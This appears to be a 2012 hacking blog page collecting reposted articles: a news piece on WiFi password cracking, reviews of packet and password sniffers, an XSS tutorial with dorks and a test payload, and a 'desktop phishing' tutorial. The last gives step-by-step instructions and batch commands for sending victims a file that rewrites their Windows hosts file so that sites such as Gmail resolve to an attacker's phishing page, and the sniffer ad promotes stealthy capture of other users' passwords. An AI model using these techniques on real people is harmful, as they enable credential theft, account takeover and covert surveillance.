Pages

Monday, July 30, 2012

How to hack a wifi network ?



You don't have to be an IT expert to be able to make use of your neighbour's security enabled Wifi network. Just watch one of the dozens of online videos that explains how."This vulnerability is mainly due to a lack of education on the part of the users"

Despite most of them being fitted with some kind of password (WEP, WPA etc.), Wifi networks are still relatively vulnerable. And by using another person's network, hackers can illegally download documents or attack websites without being traced.
If pirates should download paedophilic pornography, it's the owner of the home network, the person who pays the monthly wireless fee, who will find himself in court. In France, an anti-piracy law called Hadopi 2 enforces this by making it impossible to sentence a home network owner for having a poorly protected network


 



















This video, viewed over a million times, shows how, with the aid of software, you can get hold of the password to a wireless network. 
Emilien Girault is an IT security consultant for SysDream.
 A Wifi network is as safe as the person who installs it is knowledgeable. There are three basic levels of protection: WEP, WPA, and WPA2 keys. Most attacks target WEP keys, because they're the least secure. To hack a WPA key, more sophisticated material is sometimes necessary. Generally, the longer the password is, the harder it is to steal. 
First you have to spy on the network, which we call ‘sniffing'. You survey the traffic and try to find the password. To do that you can launch an attack by what's called the ‘dictionary'; a programme that tries out various names that exist in the dictionary. There's also a ‘brute force' attack, which tries all character combinations possible. To find a password that's more than eight characters long can take over a week to find.
It's sometimes the internet provider that is at fault. Just recently hackers realised that the default passwords given out by Bbox, [a three-way wireless box offered by French mobile telecoms company Bouygues Telecom], were automatically generated using the network name. As most people don't bother to change their password, it meant that their networks were left exposed. This vulnerability is mainly due to a lack of education on the part of the users, which is then taken advantage of by hackers, making their work all the more easy.
Open networks, or ‘hotspots' that you can log on to in airports or train stations, are also affected. Internet providers are setting up increasing numbers of these hotspots. And although they require identification, there are ways of getting around the checkpoint. One technique is to put in place a ‘fake hotspot' in order to trick users into entering their user details into the fake portal. It then saves the data, and enters it into a database owned by the hackers. They can then be used to connect to the internet, or share it with others.
If you put all of this in the context of the Hadopi law, which enforces, amongst other things, the punishment of individuals who do not secure their connection, you soon realise, that actually applying the law, is very difficult. Firstly, we need to define exactly what a secure computer or network is..." 

source :  http://observers.france24.com/

Thursday, July 26, 2012

WebSiteSniffer


WebSiteSniffer is a free packet sniffer that seizes all the basic statistics of the applications you downloaded while browsing the Internet, and backlogs them right on your PC’s hard drive under a specified folder.
This excellent packet capture windows app allows you to choose the type of Website files to be captured such as Text Files, HTML Files,  CSS Files, XML Files, Images, Video/Audio Files, Flash (.swf) files, or Scripts.
While grasping the downloaded files, the main window of this packet sniffer displays general statistics of each downloaded file such as size, number of files for each file type like Images, Text, HTML and so on.
000
The best part is that WebSiteSniffer doesn’t require any installation. However, in order to get started with this packet sniffing software, you need to give a couple of minutes to its downloading process.
Basic System Requirements:
WebSiteSniffer works well with any version of Windows, starting from Windows 2000 and up to Windows 7, including 64-bit systems.

How to Download Packet Sniffer: WebSiteSniffer

  • Go onto the below linked website
  • Scroll down, under the “Feedback” column, Click on “Download WebSiteSniffer” (You can select either 32-bit version or x64 version, whichever version is compatible with your system )
  • Double-Click on the downloaded icon
  • Since it is a Zip-File, hence you need to extract in order to unzip. Therefore, Click on “Extract All” given at the navigation bar.
  • Click on “Extract”
  • You will soon find your file extracted. Simply run the executable file – WebSiteSniffer.exe.
Yup…there you are. Quickly start capturing all the statistics of your downloaded files. This free packet analyzer is highly recommended if you want to know more about the software you have downloaded .
You can also check  Network Packet Sniffer reviewed by us.
In short, WebSiteSniffer is an excellent network sniffer that captures statistics of all the downloaded files. Go ahead and Download WebSiteSniffer Free!!
source : http://www.ilovefreesoftware.com 

Cross Site Scripting(XSS) Complete Tutorial


What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users. In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the infected or a specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms. 

Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
It will be helpful for understanding XSS , if you have the following prerequisite:
  • Strong Knowledge in HTML,javascript(Reference).
  • Basic Knowledge in HTTP client-Server Architecure(Reference)
  • [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability. 

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.


Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .


Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.


Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field. 

View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .


Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.


Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?

  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos) 
 source : http://www.breakthesecurity.com
 

Ace Password Sniffer



Capture passwords through http, ftp, smtp, pop3, telnet.
 Free Download
 Buy Now (only $29.95)
New version provides candidates of username or password for HTTP post submission.
The effective password recovery utility brings you a brand-new way to get your forgotten password back. Network administrators or concerned parents can also use it to capture passwords of other users, but such action may be considered as invasion of privacy, and make sure you have the right to do so. Currently Ace Password Sniffer supports passwords monitoring through FTP, POP3, HTTP, SMTP, Telnet, including some web mail password.
Ace Password Sniffer works passively and don't generate any network traffic, therefore, it is very hard to be detected by others. And you needn't install any additional software on the target PCs or workstations. If your network is connected through switch, you can run the sniffer on the gateway or proxy server, which can get all network traffic.
This stealth-monitoring utility is useful to recover your network passwords, to receive network passwords of children for parents, and to monitor passwords abuse for server administrators.



Read more : http://www.effetech.com/aps/

Wednesday, July 25, 2012

Desktop Phishing - Step by step tutorial


 It is an advance form of phishing. Kindly read my previous post on normal phishing herebefore proceeding.Difference between phishing and desktop phishing is as follows.

In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.


2.Victim enters his credentials in fake login page that goes to attacker.
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.


What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.
Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.






Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.

source :  http://www.explorehacking.com